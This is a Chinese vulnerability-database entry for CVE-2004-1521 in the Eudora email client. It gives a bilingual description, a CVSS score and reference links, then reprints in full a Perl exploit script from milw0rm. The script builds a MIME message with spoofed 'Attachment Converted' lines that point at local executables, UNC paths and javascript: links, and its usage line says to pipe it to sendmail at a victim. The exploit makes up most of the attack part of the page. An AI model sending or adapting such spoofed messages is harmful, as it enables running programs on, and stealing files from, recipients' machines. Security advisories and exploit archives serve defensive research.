CVE-2004-1521
CVSS5.0
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 22:55:41
NMCOE    

[原文]Eudora 6.2.0.14 does not issue a warning when a user forwards an e-mail message that contains base64 or quoted-printable encoded attachments, which makes it easier for remote attackers to read arbitrary files via spoofed "Converted" headers.


[CNNVD]Eudora信息泄漏漏洞(CNNVD-200412-600)

        Eudora 6.2.0.14版本在用户转送包含基于64位或引用可打印编码附件的邮件信息时不能发布警告。远程攻击者可以借助"Converted"头文件轻松读取任意文件。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1521
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1521
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-600
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110037078519691&w=2
(UNKNOWN)  BUGTRAQ  20041113 Eudora 6.2 attachment spoof
http://marc.info/?l=ntbugtraq&m=110053102601655&w=2
(UNKNOWN)  NTBUGTRAQ  20041113 Eudora 6.2 attachment spoof
http://packetstormsecurity.nl/0411-exploits/eudora62014.txt
(VENDOR_ADVISORY)  MISC  http://packetstormsecurity.nl/0411-exploits/eudora62014.txt
http://xforce.iss.net/xforce/xfdb/18064
(UNKNOWN)  XF  eudora-base64-attach-spoof-variant(18064)

- 漏洞信息

Eudora信息泄漏漏洞
中危 未知
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        Eudora 6.2.0.14版本在用户转送包含基于64位或引用可打印编码附件的邮件信息时不能发布警告。远程攻击者可以借助"Converted"头文件轻松读取任意文件。

- 公告与补丁

        

- 漏洞信息 (163)

Eudora 6.0.3 Attachment Spoofing Exploit (windows) (EDBID:163)
windows remote
2004-03-19 Verified
0 n/a
N/A [点击下载]
#!/usr/bin/perl --

use MIME::Base64;

print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.0.3 on Windows spoof, LaunchProtect\n";
print "MIME-Version: 1.0\n";
print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
print "\n";
print "This is a multi-part message in MIME format.\n";
print "--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";

print "Pipe the output of this script into:   sendmail -i victim\n";

print "\nWith spoofed attachments, we could 'steal' files if the 
message
was forwarded (not replied to).\n";

print "\nWithin plain-text email (or plain-text, inline MIME parts) 
embedded
CR=x0d characters get converted internally into a NUL=x00 and ignored,
so we can spoof \"attachment converted\" lines:\n";

print "\nThe following work fine (but are boring and/or put up 
warnings):\n";
print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
print "Attachment Converted\r: c:\\winnt\\system32\\calc.exe\n";
print "(Note how JavaScript is done with IE, web with default browser 
Netscape)\n";
print "Attachment Converted\r: <A 
href=javascript:alert(%27hello%27)>hello.txt</a>\n";
print "Attachment Converted\r: <A 
href=http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx>web.txt</a>\n";
print "Attachment Converted\r: <A 
href=c:/winnt/system32/calc.exe>file.txt</a>\n";

print "\nIf we can guess the full path to the attach directory then can
change the name shown to anything we like, but get broken icon:\n";
print "Attachment Converted\r: <A 
href=H:/eudora/attach/calc>file.txt</a>\n";

print "\nCuteness value only:\n";
print "Attachment Converted\r: <A 
href=c:/winnt/system32/calc.exe>file1.txt</a> xyz <A href=c:/winnt/system32/calc.exe>file2.txt</a>\n";

print "\n<x-html>
With <b>HTML</b> <i>inclusions</i> we can do
<a href=c:/winnt/system32/calc.exe>file</a>,
<a 
href=\"http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\">http</a>
and
<a href=\"javascript:alert(\x27hello\x27)\">javascript</a>
references. Any way to exploit this?
</x-html>\n";

print "\n<x-rich>
Can also do RTF inclusions. Can this be abused?
</x-rich>\n";

print "\nThose <x-xyz></x-xyz> constructs allow spoofing
attachments easily, without embedded CR:\n\n";
print "HTML\n";
print "<x-html></x-html>Attachment Converted: \"xyz\"\n";
print "Rich\n";
print "<x-rich></x-rich>Attachment Converted: \"xyz\"\n";
print "Flowed\n";
print "<x-flowed></x-flowed>Attachment Converted: \"xyz\"\n";

print "\n";

print "\n--zzz\n";
print "Content-Type: text/plain; name=\"plain.txt\"\n";
print "Content-Transfer-Encoding: 7bit\n";
print "Content-Disposition: inline; filename=\"plain.txt\"\n";
print "\n";
print "Within a 'plain' attachment:\n";
print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";

print "\n--zzz\n";
print "Content-Type: text/plain; name=\"qp.txt\"\n";
print "Content-Transfer-Encoding: quoted-printable \n";
print "Content-Disposition: inline; filename=\"qp.txt\"\n";
print "\n";
print "Within quoted-printable encoded parts still need the embedded 
CR:\n";
print "=41ttachment=20=43onverted\r=3a 
\"c:\\winnt\\system32\\calc.exe\"\n";

print "\n--zzz\n";
print "Content-Type: text/plain; name=\"b64.txt\"\n";
print "Content-Transfer-Encoding: base64\n";
print "Content-Disposition: inline; filename=\"b64.txt\"\n";
print "\n";
$z = "Within base64 encoded (plain-text, inline) MIME parts, can 
spoof\r
without embedded CR (but line termination is CR-NL):\r
Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r\n";
print encode_base64($z);

print "\n--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";

print "\n=====\n";

$X = 'README'; $Y = "$X.bat";
print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n";
$z = "rem Funny joke\r\npause\r\n";
print "begin 600 $X\n", pack('u',$z), "`\nend\n";
print "\nand (in another message or) after some blurb so is scrolled 
off in
another screenful, also send $Y. Clicking on $X does not
get it any more (but gets $Y, with a LauchProtect warning):\n";
$z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n";
print "begin 600 $Y\n", pack('u',$z), "`\nend\n";

print "\n=====\n";

print "
Eudora 6.0.3 LaunchProtect handles the X-X.exe dichotomy in the attach
directory only, and allows spoofed attachments pointing to an 
executable
stored elsewhere to run without warning:\n";
print "Attachment Converted\r: <a 
href=c:/winnt/system32/calc>go.txt</a>\n";
print "Attachment Converted\r: c:/winnt/system32/calc\n";

print "
Can be exploited if there is more than one way into attach: in my setup
H: and \\\\rome\\home are the same thing, but Eudora does not know 
that.\n";
print "These elicit warnings:\n";
print "Attachment Converted\r: <a 
href=h:/eudora/attach/README>readme.txt</a>\n";
print "Attachment Converted\r: h:/eudora/attach/README\n";
print "Attachment Converted\r: \\README\n";
print "Attachment Converted\r: .\\README\n";
print "Attachment Converted\r: \\.\\README\n";
print "Attachment Converted\r: ?\\README\n";
print "Attachment Converted\r: \\?\\README\n";
print "while these do the bad thing without warning:\n";
print "Attachment Converted\r: <a 
href=file://rome/home/eudora/attach/README>readme</a>\n";
print "Attachment Converted\r: //rome/home/eudora/attach/README\n";
print "Attachment Converted\r: 
\\\\rome\\home\\eudora\\attach\\README\n";

print "
For the default setup, Eudora knows that C:\\Program Files
and C:\\Progra~1 are the same thing:\n";
print "Attachment Converted\r: \"c:/program 
files/qualcomm/eudora/attach/README\"\n";
print "Attachment Converted\r: 
\"c:/progra~1/qualcomm/eudora/attach/README\"\n";
print "
and also knows that various UNC references:
\\\\localhost\\c...
\\\\127.0.0.1\\c...
\\\\BIOSNAME\\c...
\\\\DNSNAME\\c...
\\\\IP\\c...
\\\\\\?\\c...
\\\\c...
...c:\\progr...
...c\\progr...
...c:progr...
...program files\\...
...progra~1\\...
or even
.\\NoSuchDir\\..\\README
//c|\\Program Files\\qualcomm\\eudora\\attach\\README
\\\\c|\\Program Files\\qualcomm\\eudora\\attach\\README
res://c:\\Program Files\\qualcomm\\eudora\\attach\\README
res:\\\\c:\\Program Files\\qualcomm\\eudora\\attach\\README
shell:Fonts\\..\\..\\Program Files\\qualcomm\\eudora\\attach\\README
%ProgramFiles%\\qualcomm\\eudora\\attach\\README
%windir%\\..\\Program Files\\qualcomm\\eudora\\attach\\README
are all the same thing...
";

print "\n";
print "\n--zzz--\n";
print "\n";

# milw0rm.com [2004-03-19]
		

- 漏洞信息

14800
Eudora Spoofed Converted Header Arbitrary File Access Issue
Exploit Public

- 漏洞描述

- 时间线

2004-03-19 Unknow
2004-03-19 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站